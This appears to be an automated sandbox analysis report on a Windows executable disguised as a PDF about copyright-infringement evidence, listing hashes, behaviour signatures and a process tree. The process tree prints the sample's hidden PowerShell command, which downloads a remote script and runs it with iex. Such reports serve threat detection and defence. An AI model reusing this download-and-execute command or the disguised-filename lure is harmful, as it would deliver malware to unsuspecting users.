Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    28-08-2024 22:02

General

  • Target

    侵犯版權證據.​​​p​​​d​​​f​​​.exe

  • Size

    199KB

  • MD5

    64909901256d98b929a187fd27cae564

  • SHA1

    cd36c89f3dede517f95361a4fedf334317ff4a27

  • SHA256

    e956c97576314addcf1245717623e8da9469ee2a85981ce4969a6079c324983f

  • SHA512

    529864aa15a6296eaf0e44f504467753f161ffeb54389c26fb16396ddb2581ef4b42c8e1befcace7ddc549cf70f3f3ddb879ab8c6f935a473ad34082d7d24958

  • SSDEEP

    3072:8sg9C3jzOavaNZV5HEb28U3ZEUV9QRT42+xB00j:8sz3jzOavQZM63ZEe6i0

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\侵犯版權證據.​​​p​​​d​​​f​​​.exe
    "C:\Users\Admin\AppData\Local\Temp\侵犯版權證據.​​​p​​​d​​​f​​​.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell.exe -ExecutionPolicy bypass -WindowStyle Hidden -NoProfile -Command "iex (iwr -uri 'https://raw.githubusercontent.com/LoneNone1807/martin/main/batman3.ps1' -useb)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1204

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1204-4-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp

    Filesize

    4KB

  • memory/1204-5-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/1204-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize

    32KB

  • memory/1204-7-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

  • memory/1204-8-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

  • memory/1204-9-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB